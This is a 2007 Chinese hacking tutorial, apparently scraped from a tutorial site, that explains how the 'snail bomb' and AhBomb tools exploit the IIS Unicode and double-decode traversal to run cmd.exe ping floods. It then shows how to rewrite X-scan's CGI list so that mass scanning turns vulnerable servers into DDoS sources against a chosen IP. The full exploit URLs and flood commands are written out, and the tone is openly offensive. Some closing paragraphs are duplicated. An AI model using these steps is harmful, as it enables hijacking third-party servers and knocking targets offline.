利用X-scan实现DDoS Ping攻击

利用X-scan实现DDoS Ping攻击 - 网络安全 - 电脑教程网

利用X-scan实现DDoS Ping攻击

日期:2007-06-18   荐:
一、从这里说起、、
一开始的时候,不能不说说两款影响力很大的DDoS Ping炸弹工具。
一个是蜗牛炸弹,一个是AhBomb。
蜗牛炸弹出来的很早,通过实现搜索有漏洞的服务器做好储备,呵呵,需要的时候,通过
控制这些有漏洞的服务器集中 Ping 攻击目标机,导致目标网络速度变慢,达到DDoS攻击的目的。
AhBomb是bigball写的一款更强大的攻击工具,(呵呵,这里很感谢他送给我的无限制版)
screen.width-300)this.width=screen.width-300' border='0' alt='Click to Open in New Window'>

从本质上说,AhBomb的实现方法和蜗牛炸弹没有什么区别,但是由于程序编写的很优秀,多线程
部分写的特别完善,而且缺省的参数导致很可能会对被攻击者带来致命的打击。
呵呵
还是分析一下吧:
首先从蜗牛炸弹开始谈起
它有一个搜索的过程,搜索unicode漏洞的主机,然后将主机地址保存在Server.dll文件中
在需要实施攻击的时候,就调动所有的服务器进行攻击。
我对一个虚拟目标 200.200.200.200 这个ip进行攻击,却省配置下截获的数据包:
screen.width-300)this.width=screen.width-300' border='0' alt='Click to Open in New Window'>

前面的部分
Get /scripts/..%c1%1c../winnt/system32/cmd.exe?/c
是通过unicode编码调用Windows服务器的命令解释器去执行命令。
具体被执行的命令是:
ping -l 65000 -n 500 200.200.200.200
这里解释如下:
ping 一个发送测试数据包检测网络状况的命令
-l 64000 发送包含由64000字节数据量的 ECHO 数据包
-n 500 发送500遍 ECHO 请求数据包
200.200.200.200 目标ip,呵呵
现在看的很清楚了吧,也不用多说。
这些命令虽然简单,但由于ping命令的使用只需要最低限度的用户权限,而具有unicode漏洞的
机器又非常多,这才会导致大量的数据涌向一处。于是、、挂了。
我们来看看AhBomb做了些什么。
screen.width-300)this.width=screen.width-300' border='0' alt='Click to Open in New Window'>

前面的部分
Get /scripts/..%%255c..%255cwinnt/system32/cmd.exe?/c
是通过unicode编码调用Windows服务器的命令解释器去执行命令,比较新的编码所以找到的
漏洞服务器应该会更多。
具体被执行的命令是:
ping 192.168.0.1 -t -i 255
这里解释如下:
ping 一个发送测试数据包检测网络状况的命令
-t 不停的发送 ECHO 数据包,是的,不停
-i 255 TTL值设为255(最大)
192.168.0.1 目标,呵呵
 
仔细看看它的参数和蜗牛炸弹的不同,具体体现在它并没有发送大数据包,而仅仅是发送的
普通大小的包,因为很多网络设备会过滤大包,标准格式的反而才能真正被发送到目标。
这里附:(TTL:生存时间,指定数据报被路由器丢弃之前允许通过的网段数量。TTL 是由发送主机
设置的,以防止数据包不断在 IP 互联网络上永不终止地循环。转发 IP 数据包时,要求路由器
至少将 TTL 减小 1。 )
 二、一款经典的扫描工具X-scan
X-scan,安全焦点的又一力作,从一开始的构想,到现在的全开放式结构设计,这种执著的精神,
难道不正是我们所追求的么?、、、
重点从它的cgi扫描功能谈起
选中Tools中的CGI列表维护功能,可以看到其中列出了从Windows到各个版本Unix系统
可能存在的cgi漏洞的列表。
screen.width-300)this.width=screen.width-300' border='0' alt='Click to Open in New Window'>

它是如何验证服务器是否存在漏洞?

[1] [2]  

调用命令解释器,执行 dir 命令!
换一换你的思维模式,用一个hacker的思维模式去想
调用 dir 命令可以,我们为什么不能调用其他的命令呢?
呵呵
这就是我要说的重点了
如果我把
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
替换成
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ping+-t+-i+255+-w+5+192.168.0.1
、、、
ping -t -i 255 -w 5 192.168.0.1
为什么用这个命令?
为了不被网络设备过滤掉,所以不发送大数据包。
为了能够让我们的数据包达到目标,我们设置TTL值为255。
-w 5 参数,指定超时间隔为5毫秒,不管对方返回信息是什么,不停的发,呵呵,这对一些过滤ICMP包
的服务器还是很管用的。
我打开cgi.lst文件,手工编辑其中的内容
经过测试目前打了SP2以后仍然会有编码漏洞的就是 IIS-DECODE 二次编码漏洞了。
我保留了两个最有可能的方式库,整理如下:
测试的目标ip为:192.168.0.1
screen.width-300)this.width=screen.width-300' border='0' alt='Click to Open in New Window'>

打开Tools中的CGI列表维护选择新的修改后的列表
screen.width-300)this.width=screen.width-300' border='0' alt='Click to Open in New Window'>

到这里,我们只要通过X-scan去大规模的扫描cgi漏洞,就可以实施对目标服务器的DDoS Ping攻击了。
到最后,罗嗦一下,其实用任何一个平台下的cgi扫描工具,稍作修改,都可以实现我们的目的。
用X-scan做讲解是因为它的出色,以及它在扫描cgi漏洞的时候是支持代理服务器连接的。

(出处:http://www.sheup.com)


 [1] [2] 


到这里,我们只要通过X-scan去大规模的扫描cgi漏洞,就可以实施对目标服务器的DDoS Ping攻击了。
到最后,罗嗦一下,其实用任何一个平台下的cgi扫描工具,稍作修改,都可以实现我们的目的。
用X-scan做讲解是因为它的出色,以及它在扫描cgi漏洞的时候是支持代理服务器连接的。

(出处:http://www.sheup.com)


 [1] [2] [3] 

标签: